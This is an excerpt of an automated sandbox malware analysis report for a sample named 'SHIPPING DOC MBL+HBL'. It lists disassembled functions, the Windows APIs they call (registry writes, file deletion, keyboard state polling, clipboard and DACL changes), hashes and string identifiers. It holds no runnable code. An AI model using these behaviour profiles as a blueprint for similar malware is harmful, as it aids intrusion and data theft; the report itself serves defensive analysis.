                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                    • String ID: *.*
                    • API String ID: 1803514871-438819550
                    • Opcode ID: 2330388e521edb1de0076cb0beb3b408be4da281b2784fa3ce239eda8d45b836
                    • Instruction ID: b8bf965d74d6df54a5b2b030e6f17d659f37e00b355fcbb835b67ef9db0ccc94
                    • Opcode Fuzzy Hash: 2330388e521edb1de0076cb0beb3b408be4da281b2784fa3ce239eda8d45b836
                    • Instruction Fuzzy Hash: D431F332541219AEDF10EFB0FC59AEE77AC9F493A4F101175E808F21A2DB30DA49CB64
                    Function 00E808E2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E809DE
                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00E8F910,00000000,?,00000000,?,?), ref: 00E80A4C
                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00E80A94
                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00E80B1D
                    • RegCloseKey.ADVAPI32(?), ref: 00E80E3D
                    • RegCloseKey.ADVAPI32(00000000), ref: 00E80E4A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Close$ConnectCreateRegistryValue
                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                    • API String ID: 536824911-966354055
                    • Opcode ID: 9eb1ffa456a3a6baa18d15495984a444034d63e00e4f8762da28840b39d38113
                    • Instruction ID: d9fd5a4ac70d878c3c481031f9f5f4b5f285ad274927bfd577f06eb96498af97
                    • Opcode Fuzzy Hash: 9eb1ffa456a3a6baa18d15495984a444034d63e00e4f8762da28840b39d38113
                    • Instruction Fuzzy Hash: 84025E752006119FCB14EF28C855E6AB7E5FF88714F04985DF989AB3A2CB34ED45CB81
                    Function 00E16841 Relevance: 24.6, Strings: 19, Instructions: 889COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID: 0D$0E$0F$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa$UCP)$UTF)$UTF16)$pG
                    • API String ID: 0-2251986989
                    • Opcode ID: 13e6db9623818f93338d991bd1a334229a311236028690efbdecabf9a71f055c
                    • Instruction ID: cbbb5bd105de7cc2bde4e65d879ac45d3703ba964647f380b9f52eb5fc54ea66
                    • Opcode Fuzzy Hash: 13e6db9623818f93338d991bd1a334229a311236028690efbdecabf9a71f055c
                    • Instruction Fuzzy Hash: DB728E75E002199BDB24DF59D8407EEB7F5FF48314F1494AAE819BB280EB709E85CB90
                    Function 00E6F17E Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00E6F19F
                    • _wcscmp.LIBCMT ref: 00E6F1B4
                    • _wcscmp.LIBCMT ref: 00E6F1CB
                      • Part of subcall function 00E643C6: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E643E1
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00E6F1FA
                    • FindClose.KERNEL32(00000000), ref: 00E6F205
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00E6F221
                    • _wcscmp.LIBCMT ref: 00E6F248
                    • _wcscmp.LIBCMT ref: 00E6F25F
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E6F271
                    • SetCurrentDirectoryW.KERNEL32(00EB8920), ref: 00E6F28F
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E6F299
                    • FindClose.KERNEL32(00000000), ref: 00E6F2A6
                    • FindClose.KERNEL32(00000000), ref: 00E6F2B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                    • String ID: *.*
                    • API String ID: 1824444939-438819550
                    • Opcode ID: dfbb621f87fe863d9e33c041d1ed235561e0efdec227d50dbe877ecf3847e9c1
                    • Instruction ID: ac6e13e9b2a46d10150b857259ae2dea8ee33b7f92b22ef3f41d50da0e13e2c0
                    • Opcode Fuzzy Hash: dfbb621f87fe863d9e33c041d1ed235561e0efdec227d50dbe877ecf3847e9c1
                    • Instruction Fuzzy Hash: 8831C0365416196EDB10AFA5FC68AEE77AC9F453A8F102171E808B21B1DB30DE85CF54
                    Function 00E6A279 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E6A299
                    • __swprintf.LIBCMT ref: 00E6A2BB
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E6A2F8
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E6A31D
                    • _memset.LIBCMT ref: 00E6A33C
                    • _wcsncpy.LIBCMT ref: 00E6A378
                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E6A3AD
                    • CloseHandle.KERNEL32(00000000), ref: 00E6A3B8
                    • RemoveDirectoryW.KERNEL32(?), ref: 00E6A3C1
                    • CloseHandle.KERNEL32(00000000), ref: 00E6A3CB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                    • String ID: :$\$\??\%s
                    • API String ID: 2733774712-3457252023
                    • Opcode ID: 9c016a1742530db0d0642bce4dae6782742a8e08227c0147b5b2b46d867cee64
                    • Instruction ID: 637abb18fa0b188170c14596d7f99449395f7f24d58a1e672eaebfd2a41039ed
                    • Opcode Fuzzy Hash: 9c016a1742530db0d0642bce4dae6782742a8e08227c0147b5b2b46d867cee64
                    • Instruction Fuzzy Hash: B531C0B1940119ABDB209FA1EC49FEF73BCEF88740F1451B6FA08F6160E77096448B24
                    Function 00E581D4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E5852A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E58546
                      • Part of subcall function 00E5852A: GetLastError.KERNEL32(?,00E5800A,?,?,?), ref: 00E58550
                      • Part of subcall function 00E5852A: GetProcessHeap.KERNEL32(00000008,?,?,00E5800A,?,?,?), ref: 00E5855F
                      • Part of subcall function 00E5852A: HeapAlloc.KERNEL32(00000000,?,00E5800A,?,?,?), ref: 00E58566
                      • Part of subcall function 00E5852A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E5857D
                      • Part of subcall function 00E585C7: GetProcessHeap.KERNEL32(00000008,00E58020,00000000,00000000,?,00E58020,?), ref: 00E585D3
                      • Part of subcall function 00E585C7: HeapAlloc.KERNEL32(00000000,?,00E58020,?), ref: 00E585DA
                      • Part of subcall function 00E585C7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E58020,?), ref: 00E585EB
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E58238
                    • _memset.LIBCMT ref: 00E5824D
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E5826C
                    • GetLengthSid.ADVAPI32(?), ref: 00E5827D
                    • GetAce.ADVAPI32(?,00000000,?), ref: 00E582BA
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E582D6
                    • GetLengthSid.ADVAPI32(?), ref: 00E582F3
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E58302
                    • HeapAlloc.KERNEL32(00000000), ref: 00E58309
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E5832A
                    • CopySid.ADVAPI32(00000000), ref: 00E58331
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E58362
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E58388
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E5839C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 3996160137-0
                    • Opcode ID: b6127928acc1f444c26549ec6c1f1bf1a5d1494384a7ba4844d931f359a4597b
                    • Instruction ID: 831cfb9abe10efc03366efa06339264f6e7df425a3e22fbf7f53d2a6b851b6dd
                    • Opcode Fuzzy Hash: b6127928acc1f444c26549ec6c1f1bf1a5d1494384a7ba4844d931f359a4597b
                    • Instruction Fuzzy Hash: 5C616671A0020AEFDF10CFA5DD45AEEBBB9FF04706F148529F915B6291DB319A09CB60
                    Function 00E80465 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E80EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E7FE38,?,?), ref: 00E80EBC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E80537
                      • Part of subcall function 00E09997: __itow.LIBCMT ref: 00E099C2
                      • Part of subcall function 00E09997: __swprintf.LIBCMT ref: 00E09A0C
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00E805D6
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00E8066E
                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00E808AD
                    • RegCloseKey.ADVAPI32(00000000), ref: 00E808BA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                    • String ID:
                    • API String ID: 1240663315-0
                    • Opcode ID: b0aefbd1b974e385177b04794012e905d4847d2eeb0e64f28aeea76c466aefac
                    • Instruction ID: bf0734acc9595bebdc9fdd46151f1016b40b0bc594bb8a62ccfbcd660d880a73
                    • Opcode Fuzzy Hash: b0aefbd1b974e385177b04794012e905d4847d2eeb0e64f28aeea76c466aefac
                    • Instruction Fuzzy Hash: D5E16031204210AFCB54EF29C895D6ABBE4EF88714B04996DF44DEB2A2DB30ED45CF51
                    Function 00E14140 Relevance: 16.9, APIs: 1, Strings: 8, Instructions: 1132COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID: 0D$0D$ERCP$Oa$VUUU$VUUU$VUUU$VUUU
                    • API String ID: 0-4146286616
                    • Opcode ID: e8a773843e99e8488560b7ac8e0c61c5892d8109ab4916c4087aa2e4de867d9f
                    • Instruction ID: af7713d2c8447f4f2876abc89be244a274296e56cfbe4aa2dc5d7db490d8f8a3
                    • Opcode Fuzzy Hash: e8a773843e99e8488560b7ac8e0c61c5892d8109ab4916c4087aa2e4de867d9f
                    • Instruction Fuzzy Hash: B2A26CB4E0421A8BDF24CF58D9907EDB7B1BB54318F2491AAD85AB7380D7709EC5CB90
                    Function 00E6003A Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?), ref: 00E60062
                    • GetAsyncKeyState.USER32(000000A0), ref: 00E600E3
                    • GetKeyState.USER32(000000A0), ref: 00E600FE
                    • GetAsyncKeyState.USER32(000000A1), ref: 00E60118
                    • GetKeyState.USER32(000000A1), ref: 00E6012D
                    • GetAsyncKeyState.USER32(00000011), ref: 00E60145
                    • GetKeyState.USER32(00000011), ref: 00E60157
                    • GetAsyncKeyState.USER32(00000012), ref: 00E6016F
                    • GetKeyState.USER32(00000012), ref: 00E60181
                    • GetAsyncKeyState.USER32(0000005B), ref: 00E60199
                    • GetKeyState.USER32(0000005B), ref: 00E601AB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: 729a3fd35cff73da77ae43ee2d1ccd223e0723ca18b7d51cee4dc148f7091398
                    • Instruction ID: 1e9927837f069d81d6d4d78f939c6a9c7edd1759bbe2fcb03ec9d6dcfb96bee3
                    • Opcode Fuzzy Hash: 729a3fd35cff73da77ae43ee2d1ccd223e0723ca18b7d51cee4dc148f7091398
                    • Instruction Fuzzy Hash: B1412C305857E96EFF708B60A8043B7BEA0AF12388F08549AC5C5675C2EBD49DC8C792
                    Function 00E784D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E09997: __itow.LIBCMT ref: 00E099C2
                      • Part of subcall function 00E09997: __swprintf.LIBCMT ref: 00E09A0C
                    • CoInitialize.OLE32 ref: 00E78518
                    • CoUninitialize.OLE32 ref: 00E78523
                    • CoCreateInstance.OLE32(?,00000000,00000017,00E92BEC,?), ref: 00E78583
                    • IIDFromString.OLE32(?,?), ref: 00E785F6
                    • VariantInit.OLEAUT32(?), ref: 00E78690
                    • VariantClear.OLEAUT32(?), ref: 00E786F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                    • API String ID: 834269672-1287834457
                    • Opcode ID: 222656bd9ba34283b3cef96adf6fa49288bc8c600cef0e0581b887c8832b31e4
                    • Instruction ID: fdb9fa0854315788b6a55255f780c0d307ace785aa4a4715623461e12930b6b6
                    • Opcode Fuzzy Hash: 222656bd9ba34283b3cef96adf6fa49288bc8c600cef0e0581b887c8832b31e4
                    • Instruction Fuzzy Hash: C461B170648301AFC710DF64CA49B5BBBE4AF58714F00991DF989BB291DB70ED48CB92
                    Function 00E7427A Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                    • String ID:
                    • API String ID: 1737998785-0
                    • Opcode ID: 3ad6efa39337a2ad95a4933e21fc10b481a3273320b63c5868beca101a0eddb3
                    • Instruction ID: ee155cf02176e9a3470d6e09ef7c168a6f94a40c78d027fb448c47a48b334d74
                    • Opcode Fuzzy Hash: 3ad6efa39337a2ad95a4933e21fc10b481a3273320b63c5868beca101a0eddb3
                    • Instruction Fuzzy Hash: 79219C35200610AFDB15AF65EC49B6D77E8EF44711F10802AF94AFB2B2DB30AC55DB94
                    Function 00E63833 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E048A1,?,?,00E037C0,?), ref: 00E048CE
                      • Part of subcall function 00E64AD8: GetFileAttributesW.KERNEL32(?,00E6374F), ref: 00E64AD9
                    • FindFirstFileW.KERNEL32(?,?), ref: 00E638E7
                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00E6398F
                    • MoveFileW.KERNEL32(?,?), ref: 00E639A2
                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00E639BF
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E639E1
                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00E639FD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                    • String ID: \*.*
                    • API String ID: 4002782344-1173974218
                    • Opcode ID: 6818389e600ca8cce45f2101778c4879205a356dc3b8b1fcf492d430e722183d
                    • Instruction ID: f2a985eb60ae487b33ea1a15a09a4d0915c834b33ea9d2765fc3346d0720a055
                    • Opcode Fuzzy Hash: 6818389e600ca8cce45f2101778c4879205a356dc3b8b1fcf492d430e722183d
                    • Instruction Fuzzy Hash: 8851BF3184510DAACF05EBA0EE929EDB7B8AF14340F246169E446770D2EF306F49CFA0
                    Function 00E6F47F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00E6F4CC
                    • Sleep.KERNEL32(0000000A), ref: 00E6F4FC
                    • _wcscmp.LIBCMT ref: 00E6F510
                    • _wcscmp.LIBCMT ref: 00E6F52B
                    • FindNextFileW.KERNEL32(?,?), ref: 00E6F5C9
                    • FindClose.KERNEL32(00000000), ref: 00E6F5DF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                    • String ID: *.*
                    • API String ID: 713712311-438819550
                    • Opcode ID: 8604bb5f133650329f263d46376c08e5fcc42e61cff0c19db347dbc071e9b0e5
                    • Instruction ID: 7f461c1309c3c16206f4ed84a91df33fa5e99dcc324143074a4453e6a6fe2c13
                    • Opcode Fuzzy Hash: 8604bb5f133650329f263d46376c08e5fcc42e61cff0c19db347dbc071e9b0e5
                    • Instruction Fuzzy Hash: 5441807194121AAFCF10DFA4EC54AEE7BB4FF04354F145566E819B32A1DB309E84CB90
                    Function 00E158C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: d30efe3df12f08c431763924fd24c5b1d2f1754656728a114139448cbede5f0d
                    • Instruction ID: 7cb25583ec675986ddd5c0be25237d1a27e64f8407329d5e2ccb2e726924f732
                    • Opcode Fuzzy Hash: d30efe3df12f08c431763924fd24c5b1d2f1754656728a114139448cbede5f0d
                    • Instruction Fuzzy Hash: C9129871A00609DFDF14CFA5DA81AEEB3F5FF88300F105A29E846B7291EB35A955CB50
                    Function 00E15680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E20F36: std::exception::exception.LIBCMT ref: 00E20F6C
                      • Part of subcall function 00E20F36: __CxxThrowException@8.LIBCMT ref: 00E20F81
                    • _memmove.LIBCMT ref: 00E505AE
                    • _memmove.LIBCMT ref: 00E506C3
                    • _memmove.LIBCMT ref: 00E5076A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
